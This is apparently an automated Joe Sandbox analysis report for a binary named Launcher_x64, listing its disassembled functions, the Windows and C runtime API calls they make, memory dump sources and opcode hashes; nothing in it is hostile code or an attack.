                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 16d1b4109c38f512293157fddd189da778e56657208dd0f34553f01270312c15
                                                                                                                                                                                                                                                                                        • Instruction ID: adc3eda15ee5b26e7fff434504f08729c65e9989f075e610f3babd6e210943ef
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16d1b4109c38f512293157fddd189da778e56657208dd0f34553f01270312c15
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73D06C3E641A58AFC210CF4AE440D41F7B8FB8A670B158066EA0993B20C231F811CEE0
                                                                                                                                                                                                                                                                                        Function 00D31F22 Relevance: 12.2, APIs: 8, Instructions: 248COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 127012223-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 199ad5061f37f1dff7dd5a8ba085f044f5af52072086aab1b28030a723268f73
                                                                                                                                                                                                                                                                                        • Instruction ID: c0d97c1af6f38bf4fe7d2ef02e22764569d7bbfc72b08921a31e10bcbbacc75b
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 199ad5061f37f1dff7dd5a8ba085f044f5af52072086aab1b28030a723268f73
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C771D072E00309ABDF259A948D42BBF7BBAEF55310F2C4019EA44A7281DB75DC44C7B0
                                                                                                                                                                                                                                                                                        Function 00D16A69 Relevance: 12.2, APIs: 8, Instructions: 177COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00D16AB0
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D16ADC
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00D16B1B
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D16B38
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D16B77
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D16B94
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D16BD6
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D16BF9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2040435927-0
                                                                                                                                                                                                                                                                                        • Opcode ID: b2806f2c04466e296f1c9ed7b428307fa531ff5e478aa03248aac30c30efc4ef
                                                                                                                                                                                                                                                                                        • Instruction ID: 9089ab254ef06a33ee206fd136aa99a1709e548ff1c5927491d4f9221feaf509
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b2806f2c04466e296f1c9ed7b428307fa531ff5e478aa03248aac30c30efc4ef
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76517EB260020ABBEB205F90EC45FEB7FAAEF44754F194428F955E6190DB74DC908BB0
                                                                                                                                                                                                                                                                                        Function 00D26032 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3213747228-0
                                                                                                                                                                                                                                                                                        • Opcode ID: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
                                                                                                                                                                                                                                                                                        • Instruction ID: 65ebb62169b0d1470ed381ec3e6d5d8fc2896633500cbe8e1eb3ccf3e30ec3b5
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c3ed0d376608a570b3b521b077c8efc077dfbec983f27d761b9b7f2e2db3b283
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9B15972A00375DFDB12CF68EC81BAE7FA5EF65318F284155E944AB282D274E901C7B4
                                                                                                                                                                                                                                                                                        Function 00D17940 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17977
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00D1797F
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17A08
                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00D17A33
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17A88
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                        • Opcode ID: 71568003e4e51a1dd5a26318f109360a913ae8bb0b8c2c17d129ee6b53c3ce2b
                                                                                                                                                                                                                                                                                        • Instruction ID: dafaad03d73ca9af5bbd0b93b0f7913fd6c3df624b2423d65a8dabfb07e0cdde
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71568003e4e51a1dd5a26318f109360a913ae8bb0b8c2c17d129ee6b53c3ce2b
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F41E434A04218ABCF11DF68E885ADE7BB5EF45324F188055E8199B362CB319E95CFB0
                                                                                                                                                                                                                                                                                        Function 00D16CBB Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D16CC1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D16CCF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00D16CE0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                                                        • Opcode ID: ce9f8459bd8c5007804482157522f1dcf2f4176c8c87f6823be2acd2fb4f4b14
                                                                                                                                                                                                                                                                                        • Instruction ID: e074455a983fb0cb76c8cee27ac77675357b8b714d60a76fa3e4ed5c5b367de7
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ce9f8459bd8c5007804482157522f1dcf2f4176c8c87f6823be2acd2fb4f4b14
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A8D0C77E6953205F83105FB57C0DC553EA5EB057117060466F845D3350D6B418558FB2
                                                                                                                                                                                                                                                                                        Function 00D2C0BA Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: 6ec90123d4c80d95194574a5413967fc49dc1ab36b197a5381c284ded8b935b0
                                                                                                                                                                                                                                                                                        • Instruction ID: 265f53bda9a63c6fb997e1fdde1c68571ed5ce20514bcffd4074831ae4e3f712
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6ec90123d4c80d95194574a5413967fc49dc1ab36b197a5381c284ded8b935b0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E6B1F270A14369AFDB11DF98E841BBD7BB1BF6A308F185158E80197392C770AD42CB75
                                                                                                                                                                                                                                                                                        Function 00D21FAE Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00D21FA5,00D17361,00D16681), ref: 00D21FBC
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D21FCA
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D21FE3
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00D21FA5,00D17361,00D16681), ref: 00D22035
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ed49ea4d891cc915d607d0cbdecba202cac6a773dbb729e1c6627eedceded169
                                                                                                                                                                                                                                                                                        • Instruction ID: 9172175d43b620fb54452a59cb75eadc4942d9008b64405bed5804baea7c9068
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed49ea4d891cc915d607d0cbdecba202cac6a773dbb729e1c6627eedceded169
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C201B93A2063317EF6252F75BD459363A55DB7577C7340229F630891E2EFA24D01E970
                                                                                                                                                                                                                                                                                        Function 00D22826 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00D22945
                                                                                                                                                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00D22BBE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                        • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                                                        • Opcode ID: ded4d7c9d5786f7a7a8b3e7d90eb16cac952cb772b27c3731f63af38aff9fff2
                                                                                                                                                                                                                                                                                        • Instruction ID: 099f1a983bead430db8d892cac098312dab5aeb4eee53b7df2bc5f6ba609434e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ded4d7c9d5786f7a7a8b3e7d90eb16cac952cb772b27c3731f63af38aff9fff2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEB16831800229AFCF25DFA4E8819BEB7B5FF68318F58415AF8116B216C735DA51CBB1
                                                                                                                                                                                                                                                                                        Function 00D1CA3C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,E7FA7683,?,?,00000000,00D33374,000000FF,?,00D1CAFD,00D1C9E4,?,00D1CB99,00000000), ref: 00D1CA71
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D1CA83
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D33374,000000FF,?,00D1CAFD,00D1C9E4,?,00D1CB99,00000000), ref: 00D1CAA5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                        • Opcode ID: 2ec70da9652abb6bdd633b8c01381a857fefd2f6d2565286116293291a31fba1
                                                                                                                                                                                                                                                                                        • Instruction ID: e5d7c1af655b16d56e28a94e1cb4a9addef38e0bc111745f8a6133cc937802e8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ec70da9652abb6bdd633b8c01381a857fefd2f6d2565286116293291a31fba1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07016735654719AFDB11DF54EC09BAEBBB9FF04714F044525E815E2290DB74A900CE70
                                                                                                                                                                                                                                                                                        Function 00D248CD Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D24952
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D24A1B
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24A82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D231C1: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D122A9,?,?,00D03E32,00001000,?,00D03D7A), ref: 00D231F3
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24A95
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24AA2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1423051803-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 4b1de6dcd2ea6e13a96e612734968aa3b157ff8699488378ad0d574931ebb3bd
